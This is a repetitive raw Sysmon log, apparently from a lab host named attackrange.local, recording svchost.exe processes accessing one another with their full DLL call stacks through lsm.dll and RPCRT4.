12:02:15.405{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.405{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.405{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.405{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.359{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.359{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.359{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.359{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.359{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.359{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 